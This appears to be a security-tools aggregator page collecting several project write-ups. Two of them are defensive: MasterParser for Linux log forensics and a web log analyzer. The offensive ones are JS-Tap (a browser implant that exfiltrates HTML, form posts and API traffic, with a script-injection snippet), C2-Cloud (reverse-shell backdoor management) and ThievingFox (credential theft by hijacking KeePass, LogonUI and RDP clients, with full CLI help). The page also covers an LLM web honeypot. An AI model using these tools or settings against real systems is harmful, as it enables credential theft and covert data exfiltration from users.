Playing with JS-Tap locally is fine, but to use it in a proper engagement you'll need to be running JS-Tap on a publicly accessible VPS and set up JS-Tap with PROXYMODE set to True. Use NGINX on the front end to handle a valid certificate.

Configuration

JS-Tap Server Configuration

Debug/Single thread config

If you're running JS-Tap with the jsTapServer.py script in single threaded mode (great for testing/demos) there are configuration options directly in the jsTapServer.py script.

Proxy Mode

For production use JS-Tap should be hosted on a publicly available server with a proper SSL certificate from someone like letsencrypt. The easiest way to deploy this is to allow NGINX to act as a front-end to JS-Tap and handle the letsencrypt cert, and then forward the decrypted traffic to JS-Tap as HTTP traffic locally (i.e. NGINX and JS-Tap run on the same VPS).

If you set proxyMode to true, the JS-Tap server runs in HTTP mode and takes the client IP address from the X-Forwarded-For header, which NGINX must be configured to set.

When proxyMode is set to false, JS-Tap runs with a self-signed certificate, which is useful for testing. The client IP is taken from the source IP of the client connection.
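
For reference, here is a minimal sketch of the relevant NGINX directives, assuming NGINX terminates TLS and forwards to JS-Tap listening locally on port 8444 (the hostname and certificate paths are placeholders):

server {
    listen 443 ssl;
    server_name jstap.example.com;                # placeholder hostname

    # placeholder Let's Encrypt certificate paths
    ssl_certificate     /etc/letsencrypt/live/jstap.example.com/fullchain.pem;
    ssl_certificate_key /etc/letsencrypt/live/jstap.example.com/privkey.pem;

    location / {
        proxy_pass http://127.0.0.1:8444;         # JS-Tap running locally in HTTP mode
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_set_header Host $host;
    }
}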

Data Directory

The dataDirectory parameter tells JS-Tap which directory to use for the SQLite database and the loot directory. Not all "loot" is stored in the database; screenshots and scraped HTML files in particular are not.

Server Port

To change the server port configuration, see the last line of jsTapServer.py:

app.run(debug=False, host='0.0.0.0', port=8444, ssl_context='adhoc')

Gunicorn Production Configuration

Gunicorn is the preferred means of running JS-Tap in production. The same settings mentioned above can be set in the jstapRun.sh bash script. Values set in the startup script take precedence over the values set directly in the jsTapServer.py script when JS-Tap is started with the gunicorn startup script.

A big difference when serving the application with Gunicorn is that you need to configure the number of workers (heavyweight processes) and threads (lightweight serving processes). JS-Tap is a very I/O-heavy application, so using threads in addition to workers helps scale it up on multi-processor machines. Note that if you're running NGINX on the same box, you need to configure NGINX to also use multiple processes so you don't bottleneck on the proxy itself.

At the top of the jstapRun.sh script are the numWorkers and numThreads parameters. I like to use the number of CPUs + 1 for workers, and 4-8 threads depending on how beefy the processors are. For NGINX, I typically set worker_processes auto; in its configuration.

Proxy Mode is set with the PROXYMODE variable, and the data directory with the DATADIRECTORY variable. Note that the data directory variable needs a trailing '/'.

When started with PROXYMODE set to False, the gunicorn startup script uses a self-signed cert, which you need to generate first with:
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

telemlib.js Configuration

These configuration variables are in the initGlobals() function.

JS-Tap Server Location

You need to configure the payload with the URL of the JS-Tap server it will connect back to.

window.taperexfilServer = "https://127.0.0.1:8444";

Mode

Set to either trap or implant. This is set with the variable:

window.taperMode = "trap";
or
window.taperMode = "implant";

Trap Mode Starting Page

Only needed for trap mode; see the explanation in the Operating Modes section above.
Sets the page the user starts on when the iFrame trap is set.

window.taperstartingPage = "http://targetapp.com/somestartpage";

If you want the trap to start on the current page, instead of redirecting the user to a different page in the iframe trap, you can use:

window.taperstartingPage = window.location.href;

Client Tag

Useful if you're using JS-Tap against multiple applications or deployments at once and want a visual indicator of which payload was loaded. Remember that the entire /payloads directory is served; you can have multiple JS-Tap payloads configured with different modes, start pages, and client tags.

This tag string (keep it short!) is prepended to the client nickname in the JS-Tap portal. Set up multiple payloads, each with the appropriate configuration for the application it's being used against, and add a tag indicating which app the client is running in.

window.taperTag = 'whatever';

Custom Payload Tasks

Used to set whether clients check for Custom Payload tasks, and how often. The jitter settings let you optionally set a floor and ceiling modifier: a random value between these two numbers is picked and added to the check delay. Set both to 0 for no jitter.

window.taperTaskCheck        = true;
window.taperTaskCheckDelay   = 5000;
window.taperTaskJitterBottom = -2000;
window.taperTaskJitterTop    = 2000;
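
As a quick illustration of the resulting check interval (a minimal sketch of the arithmetic, not JS-Tap's actual code), with the values above each client waits the base delay plus a random jitter:

import random

task_check_delay = 5000                   # base delay in ms
jitter_bottom, jitter_top = -2000, 2000   # jitter floor and ceiling in ms

# a random value between the floor and ceiling is added to the base delay
effective_delay = task_check_delay + random.randint(jitter_bottom, jitter_top)
print(effective_delay)                    # somewhere between 3000 and 7000 ms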

Exfiltrate HTML

A true/false setting controlling whether a copy of the HTML of each page viewed is exfiltrated.

window.taperexfilHTML = true;

Copy Form Submissions

A true/false setting controlling whether a copy of all form posts is intercepted.

window.taperexfilFormSubmissions = true;

MonkeyPatch APIs

Enables monkeypatching of the XHR and Fetch APIs. This works in trap mode; in implant mode, only the Fetch API is monkeypatched. Monkeypatching allows JavaScript to be rewritten at runtime: enabling this feature rewrites the XHR and Fetch networking APIs used by JavaScript code in order to tap the contents of those network calls. Note that jQuery-based network calls are captured via the XHR API, which jQuery uses under the hood.

window.monkeyPatchAPIs = true;

Screenshot after API calls

By default, JS-Tap captures a new screenshot after the user navigates to a new page. Some applications do not change their path when new data is loaded, which would cause missed screenshots. JS-Tap can therefore be configured to capture a new screenshot after an XHR or Fetch API call is made, since these calls are often used to retrieve new data to display. Two settings are offered: one to enable the "after API call screenshot", and a delay in milliseconds; that many milliseconds after the API call, JS-Tap captures the new screenshot.

window.postApiCallScreenshot = true;
window.screenshotDelay = 1000;

JS-Tap Portal

Login with the admin credentials provided by the server script on startup.

Clients show up on the left, selecting one will show a time series of their events (loot) on the right.

The clients list can be sorted by time (first seen, last update received), and the list can be filtered to show only the "starred" clients. There is also a quick filter search above the clients list that lets you quickly filter for clients containing the entered string; this is useful if you set an optional tag in the payload configuration. Optional tags show up prepended to the client nickname.

Each client has an 'x' button (near the star button). This lets you delete the session for that client; if a client is sending junk or useless data, deleting its session prevents it from submitting future data.

When the JS-Tap payload starts, it retrieves a session from the JS-Tap server. If you want to stop all new client sessions from being issued, select Session Settings at the top and disable new client sessions. You can also block specific IP addresses from receiving a session there.

Each client has a "notes" feature. If you find juicy information for that particular client (credentials, API tokens, etc) you can add it to the client notes. After you've reviewed all your clients and made you notes, the View All Notes feature at the top allows you to export all notes from all clients at once.

The events list can be filtered by event type if you're trying to focus on something specific, like screenshots. Note that the events/loot list does not automatically update (the clients list does); to load the latest events for a client, select that client again on the left.

Custom Payloads

Starting in version 1.02 there is a custom payload feature. Multiple JavaScript payloads can be added in the JS-Tap portal and executed on a single client, all current clients, or set to autorun on all future clients. Payloads can be written/edited within the JS-Tap portal, or imported from a file. Payloads can also be exported. The format for importing payloads is simple JSON. The JavaScript code and description are simply base64 encoded.

[{"code":"YWxlcnQoJ1BheWxvYWQgMSBmaXJpbmcnKTs=","description":"VGhlIGZpcnN0IHBheWxvYWQ=","name":"Payload 1"},{"code":"YWxlcnQoJ1BheWxvYWQgMiBmaXJpbmcnKTs=","description":"VGhlIHNlY29uZCBwYXlsb2Fk","name":"Payload 2"}]

The main user interface for custom payloads is from the top menu bar. Select Custom Payloads to open the interface. Any existing payloads will be shown in a list on the left. The button bar allows you to import and export the list. Payloads can be edited on the right side. To load an existing payload for editing select the payload by clicking on it in the Saved Payloads list. Once you have payloads defined and saved, you can execute them on clients.

In the main Custom Payloads view you can launch a payload against all current clients (the Run Payload button). You can also toggle on the Autorun attribute of a payload, which means that all new clients will run the payload. Note that existing clients will not run a payload based on the Autorun setting.

You can toggle on Repeat Payload and the payload will be tasked for each client when they check for tasks. Remember, the rate at which a client checks for custom payload tasks is configurable in the main JS-Tap payload configuration, and it can also be changed at runtime by a custom payload that calls the updateTaskCheckInterval(newDelay) function. The jitter in the task check delay can be set with the updateTaskCheckJitter(newTop, newBottom) function.

The Clear All Jobs button in the custom payload UI will delete all custom payload jobs from the queue for all clients and resets the auto/repeat run toggles.

To run a payload on a single client, use the Run Payload button on the specific client you wish to run it on, and then hit the run button for the specific payload you wish to use. You can also set Repeat Payload on individual clients.

Tools

A few tools are included in the tools subdirectory.

clientSimulator.py

A script to stress test the jsTapServer. Good for determining roughly how many clients your server can handle. Note that running the clientSimulator script is probably more resource intensive than the actual jsTapServer, so you may wish to run it on a separate machine.

At the top of the script is a numClients variable; set it to how many clients you want to simulate. The script will spawn a thread for each, retrieve a client session, and send data simulating a client.

numClients = 50

You'll also need to configure where you're running the jsTapServer for the clientSimulator to connect to:

apiServer = "https://127.0.0.1:8444"

JS-Tap run using gunicorn scales quite well.

MonkeyPatchApp

A simple app used for testing XHR/Fetch monkeypatching, but it can also serve as a general test application for the payload.

Run with:

python3 monkeyPatchLab.py

By default this will start the application running on:

https://127.0.0.1:8443

Pressing the "Inject JS-Tap payload" button will run the JS-Tap payload. This works for either implant or trap mode. You may need to point the monkeyPatchLab application at a new JS-Tap server location for loading the payload file, you can find this set in the injectPayload() function in main.js

function injectPayload()
{
    // Dynamically append a script tag that pulls the JS-Tap payload from the JS-Tap server
    document.head.appendChild(Object.assign(document.createElement('script'),
        {src: 'https://127.0.0.1:8444/lib/telemlib.js', type: 'text/javascript'}));
}

formParser.py

An abandoned tool, but a good start on analyzing HTML for forms and parsing out their parameters. It was intended to help automatically generate JavaScript payloads targeting form posts.

You should be able to run it on exfiltrated HTML files. Again, this is currently abandonware.

generateIntelReport.py

No longer working; this was used before JS-Tap had a web UI. The generateIntelReport script would comb through the gathered loot and generate a PDF report. Saving all the loot to disk is now disabled for performance reasons; most of it is stored in the database, with the exception of exfiltrated HTML code and screenshots.

Contact

@hoodoer
hoodoer@bitwisemunitions.dev



MasterParser - Powerful DFIR Tool Designed For Analyzing And Parsing Linux Logs

By: Zion3R


What is MasterParser ?

MasterParser is a robust Digital Forensics and Incident Response tool crafted for analyzing Linux logs in the /var/log directory. Designed to expedite the investigation of security incidents on Linux systems, MasterParser scans supported logs, such as auth.log, and extracts critical details including SSH logins, user creations, event names, IP addresses, and much more. The tool's generated summary presents this information in a clear and concise format, enhancing efficiency and accessibility for incident responders. Beyond its immediate utility for DFIR teams, MasterParser is also valuable to the broader InfoSec and IT community, contributing to the swift and comprehensive assessment of security events on Linux platforms.


MasterParser Wallpapers

Love MasterParser as much as we do? Dive into the fun and jazz up your screen with our exclusive MasterParser wallpaper! Click the link below and get ready to add a splash of excitement to your device! Download Wallpaper

Supported Logs Format

This is the list of supported log formats within the /var/log directory that MasterParser can analyze. In future updates, MasterParser will support additional log formats.

Supported Log Formats List
  • auth.log

Feature & Log Format Requests:

If you wish to propose the addition of a new feature or log format, kindly submit your request by creating an issue: Click here to create a request

How To Use ?

How To Use - Text Guide

  1. From this GitHub repository, press "<> Code" and then "Download ZIP".
  2. From "MasterParser-main.zip", extract the folder "MasterParser-main" to your Desktop.
  3. Open a PowerShell terminal and navigate to the "MasterParser-main" folder.
# How to navigate to the "MasterParser-main" folder from the PS terminal
PS C:\> cd "C:\Users\user\Desktop\MasterParser-main\"
  4. Now you can execute the tool; for example, to see the tool's command menu:
# How to show MasterParser menu
PS C:\Users\user\Desktop\MasterParser-main> .\MasterParser.ps1 -O Menu
  5. To run the tool, put all your /var/log/* logs into the 01-Logs folder, and execute the tool like this:
# How to run MasterParser
PS C:\Users\user\Desktop\MasterParser-main> .\MasterParser.ps1 -O Start
  6. That's it, enjoy the tool!

How To Use - Video Guide

https://github.com/YosfanEilay/MasterParser/assets/132997318/d26b4b3f-7816-42c3-be7f-7ee3946a2c70

MasterParser Social Media Publications

Social Media Posts
1. First Tool Post
2. First Tool Story Publication By Help Net Security
3. Second Tool Story Publication By Forensic Focus
4. MasterParser featured in Help Net Security: 20 Essential Open-Source Cybersecurity Tools That Save You Time


C2-Cloud - The C2 Cloud Is A Robust Web-Based C2 Framework, Designed To Simplify The Life Of Penetration Testers

By: Zion3R


The C2 Cloud is a robust web-based C2 framework, designed to simplify the life of penetration testers. It allows easy access to compromised backdoors, just like accessing an EC2 instance in the AWS cloud. It can manage several simultaneous backdoor sessions with a user-friendly interface.

C2 Cloud is open source. Security analysts can confidently perform simulations, gaining valuable experience and contributing to the proactive defense posture of their organizations.

Reverse shells support:

  1. Reverse TCP
  2. Reverse HTTP
  3. Reverse HTTPS (configure it behind an LB)
  4. Telegram C2

Demo

C2 Cloud walkthrough: https://youtu.be/hrHT_RDcGj8
Ransomware simulation using C2 Cloud: https://youtu.be/LKaCDmLAyvM
Telegram C2: https://youtu.be/WLQtF4hbCKk

Key Features

๐Ÿ”’ Anywhere Access: Reach the C2 Cloud from any location.
๐Ÿ”„ Multiple Backdoor Sessions: Manage and support multiple sessions effortlessly.
๐Ÿ–ฑ๏ธ One-Click Backdoor Access: Seamlessly navigate to backdoors with a simple click.
๐Ÿ“œ Session History Maintenance: Track and retain complete command and response history for comprehensive analysis.

Tech Stack

๐Ÿ› ๏ธ Flask: Serving web and API traffic, facilitating reverse HTTP(s) requests.
๐Ÿ”— TCP Socket: Serving reverse TCP requests for enhanced functionality.
๐ŸŒ Nginx: Effortlessly routing traffic between web and backend systems.
๐Ÿ“จ Redis PubSub: Serving as a robust message broker for seamless communication.
๐Ÿš€ Websockets: Delivering real-time updates to browser clients for enhanced user experience.
๐Ÿ’พ Postgres DB: Ensuring persistent storage for seamless continuity.

Architecture

Application setup

  • Management port: 9000
  • Reverse HTTP port: 8000
  • Reverse TCP port: 8888

  • Clone the repo

  • Optional: Update chait_id and bot_token in c2-telegram/config.yml (a minimal sketch follows this list)
  • Execute docker-compose up -d to start the containers. Note: the c2-api service will not start until the database is initialized; if you receive 500 errors, please try again after some time.
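
As a minimal illustration of that optional Telegram configuration (the exact layout of c2-telegram/config.yml may differ; both values below are placeholders):

chait_id: "123456789"                     # placeholder Telegram chat ID (key name as given above)
bot_token: "0000000000:AAAA-placeholder"  # placeholder bot token from @BotFather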

Credits

Inspired by Villain, a CLI-based C2 developed by Panagiotis Chartas.

License

Distributed under the MIT License. See LICENSE for more information.

Contact



OSTE-Web-Log-Analyzer - Automate The Process Of Analyzing Web Server Logs With The Python Web Log Analyzer

By: Zion3R


Automate the process of analyzing web server logs with the Python Web Log Analyzer. This powerful tool is designed to enhance security by identifying and detecting various types of cyber attacks within your server logs. Stay ahead of potential threats with features that include:


Features

  1. Attack Detection: Identify and flag potential Cross-Site Scripting (XSS), Local File Inclusion (LFI), Remote File Inclusion (RFI), and other common web application attacks.

  2. Rate Limit Monitoring: Detect suspicious patterns in multiple requests made in a short time frame, helping to identify brute-force attacks or automated scanning tools (a minimal sketch of this idea follows this list).

  3. Automated Scanner Detection: Keep your web applications secure by identifying requests associated with known automated scanning tools or vulnerability scanners.

  4. User-Agent Analysis: Analyze and identify potentially malicious User-Agent strings, allowing you to spot unusual or suspicious behavior.
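
To make the rate-limit idea concrete, here is a minimal sliding-window sketch (not the tool's actual implementation; it assumes Apache/NGINX common log format, and the window size and threshold are illustrative):

import re
from collections import defaultdict, deque
from datetime import datetime

WINDOW_SECONDS = 10   # sliding window size (illustrative)
MAX_REQUESTS = 20     # requests per window before an IP is flagged (illustrative)

# common log format begins with: <ip> <ident> <user> [<timestamp>] ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\]')

def flag_bursts(lines):
    windows = defaultdict(deque)
    flagged = set()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, raw_ts = m.groups()
        ts = datetime.strptime(raw_ts, '%d/%b/%Y:%H:%M:%S %z')
        q = windows[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > WINDOW_SECONDS:
            q.popleft()                  # drop requests older than the window
        if len(q) > MAX_REQUESTS:
            flagged.add(ip)
    return flagged

with open('access.log') as f:
    for ip in sorted(flag_bursts(f)):
        print(f'[!] possible brute-force or scanner: {ip}')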

Future Features

This project is actively developed, and future features may include:

  1. IP Geolocation: Identify the geographic location of IP addresses in the logs.
  2. Real-time Monitoring: Implement real-time monitoring capabilities for immediate threat detection.

Installation

The tool only requires Python 3 at the moment.

  1. git clone https://github.com/OSTEsayed/OSTE-Web-Log-Analyzer.git
  2. cd OSTE-Web-Log-Analyzer
  3. python3 WLA-cli.py

Usage

After cloning the repository to your local machine, you can start the application by executing python3 WLA-cli.py. A simple usage example: python3 WLA-cli.py -l LogSampls/access.log -t

Use -h or --help for more detailed usage examples: python3 WLA-cli.py -h

Contact

LinkedIn: https://www.linkedin.com/in/oudjani-seyyid-taqy-eddine-b964a5228



ThievingFox - Remotely Retrieving Credentials From Password Managers And Windows Utilities

By: Zion3R


ThievingFox is a collection of post-exploitation tools to gather credentials from various password managers and Windows utilities. Each module leverages a specific method of injecting into the target process, and then hooks internal functions to gather credentials.

The accompanying blog post can be found here


Installation

Linux

Rustup must be installed; follow the instructions available here: https://rustup.rs/

The mingw-w64 package must be installed. On Debian, this can be done using:

apt install mingw-w64

Both x86 and x86_64 Windows targets must be installed for Rust:

rustup target add x86_64-pc-windows-gnu
rustup target add i686-pc-windows-gnu

Mono and Nuget must also be installed; instructions are available here: https://www.mono-project.com/download/stable/#download-lin

After adding the Mono repositories, Nuget can be installed using apt:

apt install nuget

Finally, Python dependencies must be installed:

pip install -r client/requirements.txt

ThievingFox works with Python >= 3.11.

Windows

Rustup must be installed; follow the instructions available here: https://rustup.rs/

Both x86 and x86_64 Windows targets must be installed for Rust:

rustup target add x86_64-pc-windows-msvc
rustup target add i686-pc-windows-msvc

A .NET development environment must also be installed. From Visual Studio, navigate to Tools > Get Tools And Features > Install ".NET desktop development".

Finally, Python dependencies must be installed:

pip install -r client/requirements.txt

ThievingFox works with Python >= 3.11.

NOTE: On a Windows host, in order to use the KeePass module, msbuild must be available in the PATH. This can be achieved by running the client from within a Visual Studio Developer PowerShell (Tools > Command Line > Developer PowerShell).

Targets

All modules have been tested on the following Windows versions:

  • Windows Server 2022
  • Windows Server 2019
  • Windows Server 2016
  • Windows Server 2012R2
  • Windows 10
  • Windows 11

[!CAUTION] Modules have not been tested on other versions, and are expected not to work.

Application / Injection Method

  • KeePass.exe: AppDomainManager Injection
  • KeePassXC.exe: DLL Proxying
  • LogonUI.exe (Windows Login Screen): COM Hijacking
  • consent.exe (Windows UAC Popup): COM Hijacking
  • mstsc.exe (Windows default RDP client): COM Hijacking
  • RDCMan.exe (Sysinternals' RDP client): COM Hijacking
  • MobaXTerm.exe (3rd party RDP client): COM Hijacking

Usage

[!CAUTION] Although I tried to ensure that these tools do not impact the stability of the targeted applications, inline hooking and library injection are unsafe, and they might result in a crash or the application becoming unstable. If that happens, running the cleanup module on the target should be enough to ensure that the next time the application is launched, no injection/hooking is performed.

ThievingFox contains 3 main modules : poison, cleanup and collect.

Poison

For each application specified in the command line parameters, the poison module retrieves the original library that is going to be hijacked (for COM hijacking and DLL proxying), compiles a library that matches the properties of the original DLL, uploads it to the server, and modifies the registry if needed to perform COM hijacking.

To speed up the process of compilation of all libraries, a cache is maintained in client/cache/.

--mstsc, --rdcman, and --mobaxterm have a specific option, respectively --mstsc-poison-hkcr, --rdcman-poison-hkcr, and --mobaxterm-poison-hkcr. If one of these options is specified, the COM hijacking will replace the registry key in the HKCR hive, meaning all users will be impacted. By default, only currently logged-in users are impacted (all users that have an HKCU hive).

--keepass and --keepassxc have specific options (--keepass-path, --keepass-share, and --keepassxc-path, --keepassxc-share) to specify where these applications are installed, if it's not the default installation path. This is not required for other applications, since COM hijacking is used.

The KeePass module requires the Visual C++ Redistributable to be installed on the target.

Multiple applications can be specified at once, or, the --all flag can be used to target all applications.

[!IMPORTANT] Remember to clean the cache if you ever change the --tempdir parameter, since the directory name is embedded inside native DLLs.

$ python3 client/ThievingFox.py poison -h
usage: ThievingFox.py poison [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepass-path KEEPASS_PATH]
[--keepass-share KEEPASS_SHARE] [--keepassxc] [--keepassxc-path KEEPASSXC_PATH] [--keepassxc-share KEEPASSXC_SHARE] [--mstsc] [--mstsc-poison-hkcr]
[--consent] [--logonui] [--rdcman] [--rdcman-poison-hkcr] [--mobaxterm] [--mobaxterm-poison-hkcr] [--all]
target

positional arguments:
target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]

options:
-h, --help show this help message and exit
-hashes HASHES, --hashes HASHES
LM:NT hash
-aesKey AESKEY, --aesKey AESKEY
AES key to use for Kerberos Authentication
-k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
-dc-ip DC_IP, --dc-ip DC_IP
IP Address of the domain controller
-no-pass, --no-pass Do not prompt for password
--tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
--keepass Try to poison KeePass.exe
--keepass-path KEEPASS_PATH
The path where KeePass is installed, without the share name (Default: /Program Files/KeePass Password Safe 2/)
--keepass-share KEEPASS_SHARE
The share on which KeePass is installed (Default: c$)
--keepassxc Try to poison KeePassXC.exe
--keepassxc-path KEEPASSXC_PATH
The path where KeePassXC is installed, without the share name (Default: /Program Files/KeePassXC/)
--keepassxc-share KEEPASSXC_SHARE
The share on which KeePassXC is installed (Default: c$)
--mstsc Try to poison mstsc.exe
--mstsc-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for mstsc, which will also work for user that are currently not
logged in (Default: False)
--consent Try to poison Consent.exe
--logonui Try to poison LogonUI.exe
--rdcman Try to poison RDCMan.exe
--rdcman-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for RDCMan, which will also work for user that are currently not
logged in (Default: False)
--mobaxterm Try to poison MobaXTerm.exe
--mobaxterm-poison-hkcr
Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for MobaXTerm, which will also work for user that are currently not
logged in (Default: False)
--all Try to poison all applications

Cleanup

For each application specified in the command line parameters, the cleanup module first removes the poisoning artifacts that force the target application to load the hooking library. Then, it tries to delete the libraries that were uploaded to the remote host.

For applications that support poisoning of both the HKCU and HKCR hives, both are cleaned up regardless.

Multiple applications can be specified at once, or, the --all flag can be used to cleanup all applications.

It does not clean extracted credentials on the remote host.

[!IMPORTANT] If the targeted application is in use while the cleanup module is run, the DLLs that were dropped on the target cannot be deleted. Nonetheless, the cleanup module will revert the configuration that enables the injection, which should ensure that the next time the application is launched, no injection is performed. Files that cannot be deleted by ThievingFox are logged.

$ python3 client/ThievingFox.py cleanup -h
usage: ThievingFox.py cleanup [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepass-share KEEPASS_SHARE]
[--keepass-path KEEPASS_PATH] [--keepassxc] [--keepassxc-path KEEPASSXC_PATH] [--keepassxc-share KEEPASSXC_SHARE] [--mstsc] [--consent] [--logonui]
[--rdcman] [--mobaxterm] [--all]
target

positional arguments:
target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]

options:
-h, --help show this help message and exit
-hashes HASHES, --hashes HASHES
LM:NT hash
-aesKey AESKEY, --aesKey AESKEY
AES key to use for Kerberos Authentication
-k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
-dc-ip DC_IP, --dc-ip DC_IP
IP Address of the domain controller
-no-pass, --no-pass Do not prompt for password
--tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
--keepass Try to cleanup all poisonning artifacts related to KeePass.exe
--keepass-share KEEPASS_SHARE
The share on which KeePass is installed (Default: c$)
--keepass-path KEEPASS_PATH
The path where KeePass is installed, without the share name (Default: /Program Files/KeePass Password Safe 2/)
--keepassxc Try to cleanup all poisonning artifacts related to KeePassXC.exe
--keepassxc-path KEEPASSXC_PATH
The path where KeePassXC is installed, without the share name (Default: /Program Files/KeePassXC/)
--keepassxc-share KEEPASSXC_SHARE
The share on which KeePassXC is installed (Default: c$)
--mstsc Try to cleanup all poisonning artifacts related to mstsc.exe
--consent Try to cleanup all poisonning artifacts related to Consent.exe
--logonui Try to cleanup all poisonning artifacts related to LogonUI.exe
--rdcman Try to cleanup all poisonning artifacts related to RDCMan.exe
--mobaxterm Try to cleanup all poisonning artifacts related to MobaXTerm.exe
--all Try to cleanup all poisonning artifacts related to all applications

Collect

For each application specified in the command line parameters, the collect module retrieves the output files stored on the remote host inside C:\Windows\Temp\<tempdir> corresponding to the application, and decrypts them. The files are deleted from the remote host, and the retrieved data is stored in client/output/.

Multiple applications can be specified at once, or, the --all flag can be used to collect logs from all applications.

$ python3 client/ThievingFox.py collect -h
usage: ThievingFox.py collect [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepassxc] [--mstsc] [--consent]
[--logonui] [--rdcman] [--mobaxterm] [--all]
target

positional arguments:
target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]

options:
-h, --help show this help message and exit
-hashes HASHES, --hashes HASHES
LM:NT hash
-aesKey AESKEY, --aesKey AESKEY
AES key to use for Kerberos Authentication
-k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
-dc-ip DC_IP, --dc-ip DC_IP
IP Address of the domain controller
-no-pass, --no-pass Do not prompt for password
--tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
--keepass Collect KeePass.exe logs
--keepassxc Collect KeePassXC.exe logs
--mstsc Collect mstsc.exe logs
--consent Collect Consent.exe logs
--logonui Collect LogonUI.exe logs
--rdcman Collect RDCMan.exe logs
--mobaxterm Collect MobaXTerm.exe logs
--all Collect logs from all applications


Galah - An LLM-powered Web Honeypot Using The OpenAI API

By: Zion3R


TL;DR: Galah (/ษกษ™หˆlษ‘ห/ - pronounced 'guh-laa') is an LLM (Large Language Model) powered web honeypot, currently compatible with the OpenAI API, that is able to mimic various applications and dynamically respond to arbitrary HTTP requests.


Description

Named after the clever Australian parrot known for its mimicry, Galah mirrors this trait in its functionality. Unlike traditional web honeypots that rely on a manual and limiting method of emulating numerous web applications or vulnerabilities, Galah adopts a novel approach. This LLM-powered honeypot mimics various web applications by dynamically crafting relevant (and occasionally foolish) responses, including HTTP headers and body content, to arbitrary HTTP requests. Fun fact: in Aussie English, Galah also means fool!

I've implemented a cache for the LLM-generated responses (the cache duration can be customized in the config file) to avoid generating multiple responses for the same request and to reduce OpenAI API costs. The cache stores responses per port, meaning that a response generated for a request on one port won't be returned for the same request on a different port.

The prompt is the most crucial part of this honeypot! You can update the prompt in the config file, but be sure not to change the part that instructs the LLM to generate the response in the specified JSON format.

Note: Galah was a fun weekend project I created to evaluate the capabilities of LLMs in generating HTTP messages, and it is not intended for production use. The honeypot may be fingerprinted based on its response time, non-standard, or sometimes weird responses, and other network-based techniques. Use this tool at your own risk, and be sure to set usage limits for your OpenAI API.
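
For context on that JSON format: the log records further below show the shape of the LLM output, an object with "Headers" (which, in the logged examples, also carries a "Status" entry) and "Body". As a language-agnostic illustration of turning such an object into a raw HTTP response (Galah itself is written in Go; this Python sketch is not the project's code):

import json

raw = '{"Headers": {"Content-Type": "text/plain", "Server": "Apache/2.4.41 (Ubuntu)", "Status": "403 Forbidden"}, "Body": "Forbidden"}'
resp = json.loads(raw)

headers = dict(resp["Headers"])
status = headers.pop("Status", "200 OK")   # status rides inside Headers in the logged examples
wire = "\r\n".join([f"HTTP/1.1 {status}"] + [f"{k}: {v}" for k, v in headers.items()])
wire += "\r\n\r\n" + resp["Body"]
print(wire)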

Future Enhancements

  • Rule-Based Response: The new version of Galah will employ a dynamic, rule-based approach, adding more control over response generation. This will further reduce OpenAI API costs and increase the accuracy of the generated responses.

  • Response Database: It will enable you to generate and import a response database. This ensures the honeypot only turns to the OpenAI API for unknown or new requests. I'm also working on cleaning up and sharing my own database.

  • Support for Other LLMs.

Getting Started

  • Ensure you have Go version 1.20+ installed.
  • Create an OpenAI API key from here.
  • If you want to serve over HTTPS, generate TLS certificates.
  • Clone the repo and install the dependencies.
  • Update the config.yaml file.
  • Build and run the Go binary!
% git clone git@github.com:0x4D31/galah.git
% cd galah
% go mod download
% go build
% ./galah -i en0 -v

โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆ โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆ โ–ˆโ–ˆ โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆ โ–ˆโ–ˆ โ–ˆโ–ˆ
โ–ˆโ–ˆ โ–ˆโ–ˆ โ–ˆโ–ˆ โ–ˆโ–ˆ โ–ˆโ–ˆ โ–ˆโ–ˆ โ–ˆโ–ˆ โ–ˆโ–ˆ
โ–ˆโ–ˆ โ–ˆโ–ˆโ–ˆ โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆ โ–ˆโ–ˆ โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆ โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆ
โ–ˆโ–ˆ โ–ˆโ–ˆ โ–ˆโ–ˆ โ–ˆโ–ˆ โ–ˆโ–ˆ โ–ˆโ–ˆ โ–ˆโ–ˆ โ–ˆโ–ˆ โ–ˆโ–ˆ
โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆ โ–ˆโ–ˆ โ–ˆโ–ˆ โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆ โ–ˆโ–ˆ โ–ˆโ–ˆ โ–ˆโ–ˆ โ–ˆโ–ˆ
llm-based web honeypot // version 1.0
author: Adel "0x4D31" Karimi

2024/01/01 04:29:10 Starting HTTP server on port 8080
2024/01/01 04:29:10 Starting HTTP server on port 8888
